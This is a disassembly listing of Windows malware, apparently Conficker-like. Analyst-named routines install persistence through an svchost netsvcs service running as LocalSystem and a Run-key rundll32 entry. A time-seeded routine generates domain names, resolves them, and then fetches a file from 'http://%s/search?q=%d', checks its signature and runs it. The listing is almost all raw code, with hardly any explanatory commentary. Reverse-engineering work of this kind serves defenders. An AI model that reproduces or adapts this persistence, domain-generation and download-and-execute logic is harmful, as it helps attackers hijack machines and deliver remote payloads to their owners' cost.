push ebx
mov ebx, ds:wcslen
push esi
push edi
push 13h
pop ecx
push [ebp+lpValueName] ; Str
mov esi, offset aSystemrootSyst ; "%SystemRoot%\\system32\\svchost.exe -k "
lea edi, [ebp+Source]
rep movsd
call ebx ; wcslen
pop ecx
lea eax, [eax+eax+4Ch]
push eax ; dwBytes
push 40h ; uFlags
call ds:GlobalAlloc
mov esi, eax
test esi, esi
mov [ebp+hMem], esi
jz short loc_9AE6D3
lea eax, [ebp+Source]
push eax ; Source
push esi ; Dest
call ds:wcscpy
push [ebp+lpValueName] ; Source
push esi ; Dest
call ds:wcscat
push 11h
pop ecx
push [ebp+Src] ; Str
mov esi, offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Services\\"
lea edi, [ebp+var_60]
rep movsd
movsw
call ebx ; wcslen
add esp, 14h
lea eax, [eax+eax+46h]
push eax ; dwBytes
push 40h ; uFlags
call ds:GlobalAlloc
mov esi, eax
xor edi, edi
cmp esi, edi
mov [ebp+var_18], esi
jnz short loc_9AE6DA
push [ebp+hMem] ; hMem
call ds:GlobalFree
loc_9AE6D3: ; CODE XREF: sub_9AE641+40�j
xor eax, eax
jmp loc_9AE84B
; ---------------------------------------------------------------------------
loc_9AE6DA: ; CODE XREF: sub_9AE641+87�j
lea eax, [ebp+var_60]
push eax ; Source
push esi ; Dest
call ds:wcscpy
push [ebp+Src] ; Source
push esi ; Dest
call ds:wcscat
add esp, 10h
push edi ; lpdwDisposition
lea eax, [ebp+hKey]
push eax ; phkResult
push edi ; lpSecurityAttributes
push 0F003Fh ; samDesired
push edi ; dwOptions
push edi ; lpClass
push edi ; Reserved
push esi ; lpSubKey
push 80000002h ; hKey
call ds:RegCreateKeyExW
test eax, eax
jnz loc_9AE838
push [ebp+lpData] ; Str
call ebx ; wcslen
mov esi, ds:RegSetValueExW
pop ecx
lea eax, [eax+eax+2]
push eax ; cbData
push [ebp+lpData] ; lpData
push 1 ; dwType
push edi ; Reserved
push offset ValueName ; "DisplayName"
push [ebp+hKey] ; hKey
call esi ; RegSetValueExW
push 4 ; cbData
lea eax, [ebp+Data]
push eax ; lpData
push 4 ; dwType
push edi ; Reserved
push offset aType ; "Type"
push [ebp+hKey] ; hKey
mov dword ptr [ebp+Data], 20h
call esi ; RegSetValueExW
push 4 ; cbData
lea eax, [ebp+Data]
push eax ; lpData
push 4 ; dwType
push edi ; Reserved
push offset aStart ; "Start"
push [ebp+hKey] ; hKey
mov dword ptr [ebp+Data], 2
call esi ; RegSetValueExW
push 4 ; cbData
lea eax, [ebp+Data]
push eax ; lpData
push 4 ; dwType
push edi ; Reserved
push offset aErrorcontrol ; "ErrorControl"
push [ebp+hKey] ; hKey
mov dword ptr [ebp+Data], edi
call esi ; RegSetValueExW
push [ebp+hMem] ; Str
call ebx ; wcslen
pop ecx
lea eax, [eax+eax+2]
push eax ; cbData
push [ebp+hMem] ; lpData
push 2 ; dwType
push edi ; Reserved
push offset aImagepath ; "ImagePath"
push [ebp+hKey] ; hKey
call esi ; RegSetValueExW
push 18h ; cbData
push offset Data ; "LocalSystem"
push 1 ; dwType
push edi ; Reserved
push offset aObjectname ; "ObjectName"
push [ebp+hKey] ; hKey
call esi ; RegSetValueExW
push [ebp+arg_10] ; Str
call ebx ; wcslen
pop ecx
lea eax, [eax+eax+2]
push eax ; cbData
push [ebp+arg_10] ; lpData
push 1 ; dwType
push edi ; Reserved
push offset aDescription ; "Description"
push [ebp+hKey] ; hKey
call esi ; RegSetValueExW
push edi ; lpdwDisposition
lea eax, [ebp+phkResult]
push eax ; phkResult
push edi ; lpSecurityAttributes
push 20006h ; samDesired
push edi ; dwOptions
push edi ; lpClass
push edi ; Reserved
push offset SubKey ; "Parameters"
push [ebp+hKey] ; hKey
call ds:RegCreateKeyExW
test eax, eax
jnz short loc_9AE81D
push [ebp+arg_0] ; Str
call ebx ; wcslen
pop ecx
lea eax, [eax+eax+2]
push eax ; cbData
push [ebp+arg_0] ; lpData
push 2 ; dwType
push edi ; Reserved
push offset aServicedll ; "ServiceDll"
push [ebp+phkResult] ; hKey
call esi ; RegSetValueExW
push [ebp+phkResult] ; hKey
call ds:RegCloseKey
push [ebp+lpValueName] ; lpValueName
push [ebp+Src] ; Src
call sub_9AE520
pop ecx
pop ecx
mov [ebp+var_14], eax
loc_9AE81D: ; CODE XREF: sub_9AE641+1A6�j
push [ebp+hKey] ; hKey
call ds:RegFlushKey
push [ebp+hKey] ; hKey
call sub_9AE496
pop ecx
push [ebp+hKey] ; hKey
call ds:RegCloseKey
loc_9AE838: ; CODE XREF: sub_9AE641+CD�j
push [ebp+hMem] ; hMem
mov esi, ds:GlobalFree
call esi ; GlobalFree
push [ebp+var_18] ; hMem
call esi ; GlobalFree
mov eax, [ebp+var_14]
loc_9AE84B: ; CODE XREF: sub_9AE641+94�j
pop edi
pop esi
pop ebx
leave
retn
sub_9AE641 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
; int __cdecl sub_setup_run_dll32_and_netsvc(char *lpMultiByteStr)
sub_setup_run_dll32_and_netsvc proc near ; CODE XREF: sub_run_dll+10A�p
Data = byte ptr -220h
var_11D = byte ptr -11Dh
Src = word ptr -11Ch
Dest = word ptr -9Ch
ValueName = byte ptr -1Ch
var_10 = dword ptr -10h
hMem = dword ptr -0Ch
var_8 = dword ptr -8
phkResult = dword ptr -4
lpMultiByteStr = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 220h
push ebx
push edi
push [ebp+74h+lpMultiByteStr] ; Str
xor ebx, ebx
mov [ebp+74h+var_8], ebx
call strlen
mov edi, eax
pop ecx
lea eax, [edi+edi+2]
push eax ; dwBytes
push 40h ; uFlags
mov [ebp+74h+var_10], edi
call ds:GlobalAlloc
cmp eax, ebx
mov [ebp+74h+hMem], eax
jnz short loc_9AE88B
xor eax, eax
jmp loc_9AEA40
; ---------------------------------------------------------------------------
loc_9AE88B: ; CODE XREF: sub_setup_run_dll32_and_netsvc+32�j
push esi
call sub_9AE195
mov esi, ds:rand
mov [ebp+74h+phkResult], eax
call esi ; rand
push 5
pop ecx
cdq
idiv ecx
lea eax, [ebp+74h+Src]
add edx, ecx
push edx
push eax
call sub_9AC672
pop ecx
pop ecx
call esi ; rand
push 10h
cdq
pop ecx
idiv ecx
test edx, edx
jz short loc_9AE912
call esi ; rand
push 15h
xor edx, edx
pop ecx
div ecx
mov edi, edx
loc_9AE8CA: ; CODE XREF: sub_setup_run_dll32_and_netsvc+87�j
call esi ; rand
push 15h
xor edx, edx
pop ecx
div ecx
mov ebx, edx
cmp edi, ebx
jz short loc_9AE8CA
push off_9BAAC8[edi*4] ; Source
lea eax, [ebp+74h+Dest]
push eax ; Dest
call ds:wcscpy
mov edi, ds:wcscat
lea eax, [ebp+74h+Dest]
push offset asc_9A48B4 ; " "
push eax ; Dest
call edi ; wcscat
push off_9BAAC8[ebx*4] ; Source
lea eax, [ebp+74h+Dest]
push eax ; Dest
call edi ; wcscat
mov edi, [ebp+74h+var_10]
add esp, 18h
xor ebx, ebx
jmp short loc_9AE928
; ---------------------------------------------------------------------------
loc_9AE912: ; CODE XREF: sub_setup_run_dll32_and_netsvc+6D�j
call esi ; rand
push 5
pop ecx
cdq
idiv ecx
lea eax, [ebp+74h+Dest]
add edx, ecx
push edx
push eax
call sub_9AC672
pop ecx
pop ecx
loc_9AE928: ; CODE XREF: sub_setup_run_dll32_and_netsvc+C0�j
inc edi
push edi ; cchWideChar
push [ebp+74h+hMem] ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push [ebp+74h+lpMultiByteStr] ; lpMultiByteStr
push ebx ; dwFlags
push ebx ; CodePage
call ds:MultiByteToWideChar
test eax, eax
jz short loc_9AE95F
push [ebp+74h+phkResult] ; int
lea eax, [ebp+74h+Dest]
push offset aNetsvcs ; "netsvcs"
push eax ; lpData
lea eax, [ebp+74h+Src]
push eax ; Src
push [ebp+74h+hMem] ; int
call sub_9AE641
add esp, 14h
mov [ebp+74h+var_8], eax
loc_9AE95F: ; CODE XREF: sub_setup_run_dll32_and_netsvc+EC�j
push [ebp+74h+phkResult] ; Memory
call ds:free
pop ecx
push [ebp+74h+hMem] ; hMem
call ds:GlobalFree
cmp [ebp+74h+var_8], ebx
jnz loc_9AEA37
mov eax, dword_9BAF74
xor eax, 0B30AA17Bh
push eax ; Seed
call ds:srand
call esi ; rand
push 5
pop ecx
cdq
idiv ecx
lea eax, [ebp+74h+ValueName]
add edx, ecx
push edx
push eax
call sub_make_array_of_alphabet
call sub_call_srand_with_seed_from_thread_id
push offset aMarnwkcw ; "marnwkcw"
push [ebp+74h+lpMultiByteStr]
lea eax, [ebp+74h+Data]
push offset aRundll32_exe_0 ; "rundll32.exe \"%s\",%s"
push 104h ; Count
push eax ; Dest
call ds:_snprintf
xor edi, edi
add esp, 20h
mov [ebp+74h+var_11D], 0
mov esi, 80000002h
inc edi
loc_9AE9D6: ; CODE XREF: sub_setup_run_dll32_and_netsvc+1E5�j
cmp esi, 80000001h
jl short loc_9AEA37
push ebx ; lpdwDisposition
lea eax, [ebp+74h+phkResult]
push eax ; phkResult
push ebx ; lpSecurityAttributes
push 20006h ; samDesired
push ebx ; dwOptions
push ebx ; lpClass
push ebx ; Reserved
push offset aSoftwareMicr_2 ; "Software\\Microsoft\\Windows\\CurrentVersi"...
push esi ; hKey
call ds:RegCreateKeyExA
test eax, eax
jnz short loc_9AEA31
lea eax, [ebp+74h+Data]
push eax ; Str
call strlen
pop ecx
inc eax
push eax ; cbData
lea eax, [ebp+74h+Data]
push eax ; lpData
push edi ; dwType
push ebx ; Reserved
lea eax, [ebp+74h+ValueName]
push eax ; lpValueName
push [ebp+74h+phkResult] ; hKey
call ds:RegSetValueExA
test eax, eax
jnz short loc_9AEA28
mov [ebp+74h+var_8], edi
loc_9AEA28: ; CODE XREF: sub_setup_run_dll32_and_netsvc+1D3�j
push [ebp+74h+phkResult] ; hKey
call ds:RegCloseKey
loc_9AEA31: ; CODE XREF: sub_setup_run_dll32_and_netsvc+1AA�j
dec esi
cmp [ebp+74h+var_8], ebx
jz short loc_9AE9D6
loc_9AEA37: ; CODE XREF: sub_setup_run_dll32_and_netsvc+125�j
; sub_setup_run_dll32_and_netsvc+18C�j
call sub_9AE140
mov eax, [ebp+74h+var_8]
pop esi
loc_9AEA40: ; CODE XREF: sub_setup_run_dll32_and_netsvc+36�j
pop edi
pop ebx
add ebp, 74h
leave
retn
sub_setup_run_dll32_and_netsvc endp
; =============== S U B R O U T I N E =======================================
sub_validate_file_and_create_process proc near ; CODE XREF: sub_9AEA8D+25�p
push ebx
xor ebx, ebx
test esi, esi
jz short loc_9AEA89
cmp eax, 200h
jbe short loc_9AEA89
push edi
lea edi, [eax-200h]
push edi ; int
push esi ; int
lea eax, [esi+eax-200h]
push eax ; int
push dword_9BAB20 ; int
push offset dword_9BAB28 ; Src
call sub_check_file_signature
add esp, 14h
test al, al
jz short loc_9AEA88
push edi ; nNumberOfBytesToWrite
push esi ; lpBuffer
call sub_create_process_for_validated_file
pop ecx
pop ecx
mov ebx, eax
loc_9AEA88: ; CODE XREF: sub_validate_file_and_create_process+34�j
pop edi
loc_9AEA89: ; CODE XREF: sub_validate_file_and_create_process+5�j
; sub_validate_file_and_create_process+C�j
mov eax, ebx
pop ebx
retn
sub_validate_file_and_create_process endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AEA8D(LPCSTR lpszUrl)
sub_9AEA8D proc near ; CODE XREF: sub_9AEE25+2E�p
var_4 = dword ptr -4
lpszUrl = dword ptr 8
push ebp
mov ebp, esp
push ecx
push esi
push edi
xor edi, edi
push edi ; int
lea eax, [ebp+var_4]
push eax ; int
push [ebp+lpszUrl] ; lpszUrl
call sub_download_file_from_URL
mov esi, eax
add esp, 0Ch
cmp esi, edi
jz short loc_9AEAC0
mov eax, [ebp+var_4]
cmp eax, edi
jz short loc_9AEAB9
call sub_validate_file_and_create_process
mov edi, eax
loc_9AEAB9: ; CODE XREF: sub_9AEA8D+23�j
push esi ; hMem
call ds:GlobalFree
loc_9AEAC0: ; CODE XREF: sub_9AEA8D+1C�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_9AEA8D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AEAC6(LPCSTR lpszUrl,int,int)
sub_9AEAC6 proc near ; CODE XREF: sub_9AEBA1+1E�p
szAgent = byte ptr -414h
var_413 = byte ptr -413h
var_14 = dword ptr -14h
hInternet = dword ptr -10h
var_C = dword ptr -0Ch
cbSize = dword ptr -8
var_1 = byte ptr -1
lpszUrl = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 414h
push ebx
push edi
xor eax, eax
xor ebx, ebx
mov [ebp+szAgent], bl
mov ecx, 0FFh
lea edi, [ebp+var_413]
rep stosd
stosw
stosb
lea eax, [ebp+cbSize]
push eax ; cbSize
lea eax, [ebp+szAgent]
push eax ; pszUAOut
push ebx ; dwOption
mov [ebp+var_1], bl
mov [ebp+cbSize], 400h
call ObtainUserAgentString
push ebx ; dwFlags
push ebx ; lpszProxyBypass
push ebx ; lpszProxy
push ebx ; dwAccessType
lea eax, [ebp+szAgent]
push eax ; lpszAgent
call ds:InternetOpenA
cmp eax, ebx
mov [ebp+hInternet], eax
jz short loc_9AEB9A
push ebx ; dwContext
push 84080300h ; dwFlags
push ebx ; dwHeadersLength
push ebx ; lpszHeaders
push [ebp+lpszUrl] ; lpszUrl
push eax ; hInternet
call ds:InternetOpenUrlA
mov edi, eax
cmp edi, ebx
jz short loc_9AEB91
push esi
mov esi, ds:HttpQueryInfoA
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+cbSize]
push eax
lea eax, [ebp+var_14]
push eax
push 20000013h
push edi
mov [ebp+var_C], ebx
mov [ebp+cbSize], 4
call esi ; HttpQueryInfoA
test eax, eax
jz short loc_9AEB89
cmp [ebp+var_14], 0C8h
jnz short loc_9AEB89
mov eax, [ebp+arg_8]
mov [ebp+cbSize], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+cbSize]
push eax
push [ebp+arg_4]
mov [ebp+var_C], ebx
push 9
push edi
call esi ; HttpQueryInfoA
test eax, eax
jz short loc_9AEB89
mov [ebp+var_1], 1
loc_9AEB89: ; CODE XREF: sub_9AEAC6+97�j
; sub_9AEAC6+A0�j ...
push edi ; hInternet
call ds:InternetCloseHandle
pop esi
loc_9AEB91: ; CODE XREF: sub_9AEAC6+6E�j
push [ebp+hInternet] ; hInternet
call ds:InternetCloseHandle
loc_9AEB9A: ; CODE XREF: sub_9AEAC6+56�j
mov al, [ebp+var_1]
pop edi
pop ebx
leave
retn
sub_9AEAC6 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9AEBA1(LPCSTR lpszUrl,int,int,int)
sub_9AEBA1 proc near ; CODE XREF: sub_9AEC85+4D�p
var_408 = dword ptr -408h
var_404 = dword ptr -404h
Str = byte ptr -400h
lpszUrl = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
sub esp, 408h
push ebp
push 400h ; int
lea eax, [esp+410h+Str]
push eax ; int
push [esp+414h+lpszUrl] ; lpszUrl
xor ebp, ebp
mov [esp+418h+var_404], ebp
call sub_9AEAC6
add esp, 0Ch
test al, al
jz loc_9AEC79
push esi
mov esi, ds:strtok
push edi
mov edi, offset Delim ; ", "
lea eax, [esp+414h+Str]
push edi ; Delim
push eax ; Str
call esi ; strtok
test eax, eax
pop ecx
pop ecx
jz loc_9AEC77
push edi ; Delim
push ebp ; Str
call esi ; strtok
cmp eax, ebp
pop ecx
pop ecx
jz short loc_9AEC77
push ebx
mov ebx, ds:atoi
push eax ; Str
call ebx ; atoi
mov ecx, [esp+41Ch+arg_4]
push edi ; Delim
push ebp ; Str
mov [ecx], ax
call esi ; strtok
mov ebp, eax
add esp, 0Ch
test ebp, ebp
jz short loc_9AEC76
and [esp+418h+var_408], 0
loc_9AEC1E: ; CODE XREF: sub_9AEBA1+A1�j
mov eax, [esp+418h+var_408]
push 3 ; MaxCount
push ebp ; Str
push off_9BAD40[eax*4] ; Str1
call ds:_strnicmp
add esp, 0Ch
test eax, eax
jz short loc_9AEC46
inc [esp+418h+var_408]
cmp [esp+418h+var_408], 0Ch
jb short loc_9AEC1E
jmp short loc_9AEC55
; ---------------------------------------------------------------------------
loc_9AEC46: ; CODE XREF: sub_9AEBA1+96�j
mov eax, [esp+418h+var_408]
mov ecx, [esp+418h+arg_8]
inc eax
mov [ecx], ax
loc_9AEC55: ; CODE XREF: sub_9AEBA1+A3�j
push edi ; Delim
push 0 ; Str
call esi ; strtok
test eax, eax
pop ecx
pop ecx
jz short loc_9AEC76
push eax ; Str
call ebx ; atoi
pop ecx
mov ecx, [esp+418h+arg_C]
mov [ecx], ax
mov [esp+418h+var_404], 1
loc_9AEC76: ; CODE XREF: sub_9AEBA1+76�j
; sub_9AEBA1+BD�j
pop ebx
loc_9AEC77: ; CODE XREF: sub_9AEBA1+47�j
; sub_9AEBA1+55�j
pop edi
pop esi
loc_9AEC79: ; CODE XREF: sub_9AEBA1+28�j
mov eax, [esp+40Ch+var_404]
pop ebp
add esp, 408h
retn
sub_9AEBA1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AEC85 proc near ; CODE XREF: sub_domain_names_generation+4E�p
szUrl = byte ptr -38h
var_19 = byte ptr -19h
Dst = word ptr -18h
var_16 = dword ptr -16h
var_12 = dword ptr -12h
var_E = word ptr -0Eh
var_C = word ptr -0Ch
var_A = word ptr -0Ah
FileTime = _FILETIME ptr -8
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push 10h ; Size
xor ebx, ebx
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call memset
call ds:rand
push 6
pop ecx
xor edx, edx
div ecx
lea eax, [ebp+szUrl]
push off_9BAD28[edx*4]
push offset aHttpWww_S ; "http://www.%s"
push 20h ; Count
push eax ; Dest
call ds:_snprintf
lea eax, [ebp+Dst]
push eax ; int
lea eax, [ebp+var_16]
push eax ; int
lea eax, [ebp+var_12]
push eax ; int
lea eax, [ebp+szUrl]
push eax ; lpszUrl
mov [ebp+var_19], bl
call sub_9AEBA1
add esp, 2Ch
test eax, eax
jz short loc_9AECF0
cmp word ptr [ebp+var_12], bx
jz short loc_9AECF0
cmp word ptr [ebp+var_16], bx
jz short loc_9AECF0
cmp [ebp+Dst], bx
jnz short loc_9AED0E
loc_9AECF0: ; CODE XREF: sub_9AEC85+57�j
; sub_9AEC85+5D�j ...
lea eax, [ebp+Dst]
push eax ; lpSystemTime
call ds:GetSystemTime
mov word ptr [ebp+var_16+2], bx
mov word ptr [ebp+var_12+2], bx
mov [ebp+var_A], bx
mov [ebp+var_E], bx
mov [ebp+var_C], bx
loc_9AED0E: ; CODE XREF: sub_9AEC85+69�j
lea eax, [ebp+FileTime]
push eax ; lpFileTime
lea eax, [ebp+Dst]
push eax ; lpSystemTime
call ds:SystemTimeToFileTime
push 3
push 52C94565h
push [ebp+FileTime.dwHighDateTime]
push [ebp+FileTime.dwLowDateTime]
call __allmul
push 580h
push 28E44000h
push edx
push eax
call __aulldiv
add eax, 0A3596526h
adc edx, ebx
mov dword ptr dbl_9BAD90, eax
mov dword ptr dbl_9BAD90+4, edx
pop ebx
leave
retn
sub_9AEC85 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AED54 proc near ; CODE XREF: sub_domain_names_generation+78�p
; sub_domain_names_generation+97�p ...
var_30 = qword ptr -30h
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
push ebp
mov ebp, esp
sub esp, 20h
mov ecx, dword ptr dbl_9BAD90+4
mov eax, dword ptr dbl_9BAD90
and dword ptr [ebp+var_8], 0
push esi
mov edx, ecx
push edi
mov dword ptr [ebp+var_8+4], edx
mov edi, 7FFFFFFFh
and edx, edi
mov dword ptr [ebp+var_10], eax
mov dword ptr [ebp+var_10+4], edx
fild [ebp+var_10]
mov esi, 80000000h
and dword ptr [ebp+var_8+4], esi
fild [ebp+var_8]
and dword ptr [ebp+var_8], 0
mov dword ptr [ebp+var_8+4], ecx
and dword ptr [ebp+var_8+4], esi
fchs
and ecx, edi
faddp st(1), st
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], ecx
push ecx
fstp [ebp+var_10]
push ecx
fild [ebp+var_18]
fild [ebp+var_8]
fchs
faddp st(1), st
fstp [esp+30h+var_30]
call sin
add esp, 8
fstp [ebp+var_20]
push 0
push 53125624h
push dword ptr dbl_9BAD90+4
push dword ptr dbl_9BAD90
call __allmul
and dword ptr [ebp+var_8], 0
mov dword ptr [ebp+var_8+4], edx
and dword ptr [ebp+var_8+4], esi
and edx, edi
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], edx
fild [ebp+var_18]
push ecx
fild [ebp+var_8]
push ecx
fchs
faddp st(1), st
fadd [ebp+var_20]
fmul [ebp+var_10]
fadd dbl_9A4958
fmul [ebp+var_10]
fstp [ebp+var_20]
fld [ebp+var_10]
fstp [esp+30h+var_30]
call log
fadd [ebp+var_20]
pop ecx
pop ecx
pop edi
fstp dbl_9BAD90
mov eax, dword ptr dbl_9BAD90
pop esi
leave
retn
sub_9AED54 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_9AEE25(LPVOID)
sub_9AEE25 proc near ; DATA XREF: sub_9AEE7C+32�o
szUrl = byte ptr -80h
var_1 = byte ptr -1
Memory = dword ptr 8
push ebp
mov ebp, esp
sub esp, 80h
push dword_9BAF78
lea eax, [ebp+szUrl]
push [ebp+Memory]
push offset aHttpSSearch?qD ; "http://%s/search?q=%d"
push 80h ; Count
push eax ; Dest
call ds:_snprintf
lea eax, [ebp+szUrl]
push eax ; lpszUrl
mov [ebp+var_1], 0
call sub_9AEA8D
add esp, 18h
test eax, eax
jz short loc_9AEE6C
push 1 ; Value
push offset dword_9BB2CC ; Target
call ds:InterlockedExchange
loc_9AEE6C: ; CODE XREF: sub_9AEE25+38�j
push [ebp+Memory] ; Memory
call ds:free
pop ecx
xor eax, eax
leave
retn 4
sub_9AEE25 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_9AEE7C(LPVOID)
sub_9AEE7C proc near ; DATA XREF: sub_domain_names_generation+161�o
ThreadId = dword ptr 8
push ebp
mov ebp, esp
push esi
mov esi, [ebp+ThreadId]
push esi ; name
call ds:gethostbyname
test eax, eax
jz short loc_9AEEC4
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax] ; in
call ds:inet_ntoa
test eax, eax
jz short loc_9AEEC4
lea ecx, [ebp+ThreadId]
push ecx ; lpThreadId
push 0 ; dwCreationFlags
push eax ; unsigned __int8 *
call ds:_mbsdup
pop ecx
push eax ; lpParameter
push offset sub_9AEE25 ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread
push eax ; hObject
call ds:CloseHandle
loc_9AEEC4: ; CODE XREF: sub_9AEE7C+10�j
; sub_9AEE7C+21�j
mov byte ptr [esi], 0
xor eax, eax
pop esi
pop ebp
retn 4
sub_9AEE7C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_domain_names_generation proc near ; CODE XREF: StartAddress+1CE�p
hMem = dword ptr -488h
var_A0 = dword ptr -0A0h
Handles = dword ptr -78h
var_50 = dword ptr -50h
ThreadId = dword ptr -4Ch
var_48 = dword ptr -48h
SystemTime = _SYSTEMTIME ptr -44h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 478h
push offset stru_9A4978
call __SEH_prolog
push 0Ah
pop eax
cmp eax, dword_9BAE64
sbb esi, esi
and esi, 9
inc esi
mov [ebp+var_2C], esi
xor edi, edi
mov [ebp+ms_exc.disabled], edi
lea eax, [ebp+SystemTime]
push eax ; lpSystemTime
call ds:GetSystemTime
cmp [ebp+SystemTime.wYear], 7D9h
ja short loc_9AEF17
jnz loc_9AF0E6
cmp [ebp+SystemTime.wMonth], 1
jb loc_9AF0E6
loc_9AEF17: ; CODE XREF: sub_domain_names_generation+36�j
call sub_call_srand_with_seed_from_thread_id
call sub_9AEC85
mov dword_9BB2CC, edi
loc_9AEF27: ; CODE XREF: sub_domain_names_generation+DC�j
mov [ebp+var_1C], edi
mov ebx, 0FAh
cmp edi, ebx
jnb short loc_9AEFAF
push 20h ; dwBytes
push 40h ; uFlags
call ds:GlobalAlloc
mov ebx, eax
mov [ebp+edi*4+hMem], ebx
call sub_9AED54
cdq
push 4
pop ecx
idiv ecx
mov esi, edx
add esi, 8
mov [ebp+var_34], esi
mov [ebp+var_48], ebx
and [ebp+var_28], 0
loc_9AEF60: ; CODE XREF: sub_domain_names_generation+B5�j
cmp [ebp+var_28], esi
jnb short loc_9AEF85
call sub_9AED54
push eax ; X
call abs
pop ecx
cdq
push 1Ah
pop ecx
idiv ecx
add edx, 61h
mov eax, [ebp+var_28]
mov [eax+ebx], dl
inc [ebp+var_28]
jmp short loc_9AEF60
; ---------------------------------------------------------------------------
loc_9AEF85: ; CODE XREF: sub_domain_names_generation+95�j
mov byte ptr [ebx+esi], 0
call sub_9AED54
and eax, 7
push off_9BAD70[eax*4]
push [ebp+edi*4+hMem]
call _mbscat
pop ecx
pop ecx
inc edi
mov esi, [ebp+var_2C]
jmp loc_9AEF27
; ---------------------------------------------------------------------------
loc_9AEFAF: ; CODE XREF: sub_domain_names_generation+63�j
mov [ebp+var_30], 1
loc_9AEFB6: ; CODE XREF: sub_domain_names_generation+1E5�j
; sub_domain_names_generation+1EF�j
xor edi, edi
cmp [ebp+var_30], edi
jz loc_9AF0C2
cmp dword_9BB2CC, edi
jnz loc_9AF0C2
loc_9AEFCD: ; CODE XREF: sub_domain_names_generation+17D�j
mov [ebp+var_1C], edi
cmp edi, esi
jnb short loc_9AF052
loc_9AEFD4: ; CODE XREF: sub_domain_names_generation+139�j
; sub_domain_names_generation+151�j
call ds:rand
cdq
mov ecx, ebx
idiv ecx
mov esi, edx
mov [ebp+var_50], esi
xor eax, eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
loc_9AEFEC: ; CODE XREF: sub_domain_names_generation+182�j
cmp [ebp+var_20], edi
jnb short loc_9AF004
mov ecx, [ebp+var_20]
cmp [ebp+ecx*4+var_A0], esi
jnz short loc_9AF04D
mov [ebp+var_24], 1
loc_9AF004: ; CODE XREF: sub_domain_names_generation+121�j
cmp [ebp+var_24], eax
jnz short loc_9AEFD4
mov ecx, [ebp+esi*4+hMem]
cmp byte ptr [ecx], 0
jnz short loc_9AF01C
mov [ebp+var_24], 1
loc_9AF01C: ; CODE XREF: sub_domain_names_generation+145�j
cmp [ebp+var_24], eax
jnz short loc_9AEFD4
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
xor eax, eax
push eax ; dwCreationFlags
push [ebp+esi*4+hMem] ; lpParameter
push offset sub_9AEE7C ; lpStartAddress
push eax ; dwStackSize
push eax ; lpThreadAttributes
call ds:CreateThread
mov [ebp+edi*4+Handles], eax
mov [ebp+edi*4+var_A0], esi
inc edi
mov esi, [ebp+var_2C]
jmp short loc_9AEFCD
; ---------------------------------------------------------------------------
loc_9AF04D: ; CODE XREF: sub_domain_names_generation+12D�j
inc [ebp+var_20]
jmp short loc_9AEFEC
; ---------------------------------------------------------------------------
loc_9AF052: ; CODE XREF: sub_domain_names_generation+104�j
push 7530h ; dwMilliseconds
push 1 ; bWaitAll
lea eax, [ebp+Handles]
push eax ; lpHandles
push esi ; nCount
call ds:WaitForMultipleObjects
and [ebp+var_1C], 0
loc_9AF068: ; CODE XREF: sub_domain_names_generation+1BE�j
cmp [ebp+var_1C], esi
jnb short loc_9AF08E
mov esi, [ebp+var_1C]
lea esi, [ebp+esi*4+Handles]
push 0 ; dwExitCode
push dword ptr [esi] ; hThread
call ds:TerminateThread
push dword ptr [esi] ; hObject
call ds:CloseHandle
inc [ebp+var_1C]
mov esi, [ebp+var_2C]
jmp short loc_9AF068
; ---------------------------------------------------------------------------
loc_9AF08E: ; CODE XREF: sub_domain_names_generation+19D�j
push 1388h ; dwMilliseconds
call ds:Sleep
xor eax, eax
loc_9AF09B: ; CODE XREF: sub_domain_names_generation+1E1�j
mov [ebp+var_1C], eax
cmp eax, ebx
jnb short loc_9AF0B9
mov ecx, [ebp+eax*4+hMem]
cmp byte ptr [ecx], 0
jnz short loc_9AF0B1
inc eax
jmp short loc_9AF09B
; ---------------------------------------------------------------------------
loc_9AF0B1: ; CODE XREF: sub_domain_names_generation+1DE�j
cmp eax, ebx
jb loc_9AEFB6
loc_9AF0B9: ; CODE XREF: sub_domain_names_generation+1D2�j
and [ebp+var_30], 0
jmp loc_9AEFB6
; ---------------------------------------------------------------------------
loc_9AF0C2: ; CODE XREF: sub_domain_names_generation+ED�j
; sub_domain_names_generation+F9�j
mov [ebp+var_1C], edi
loc_9AF0C5: ; CODE XREF: sub_domain_names_generation+20F�j
cmp [ebp+var_1C], ebx
jnb short loc_9AF0E6
mov eax, [ebp+var_1C]
push [ebp+eax*4+hMem] ; hMem
call ds:GlobalFree
inc [ebp+var_1C]
jmp short loc_9AF0C5
; ---------------------------------------------------------------------------
loc_9AF0DF: ; DATA XREF: .text:stru_9A4978�o
xor eax, eax
inc eax
retn
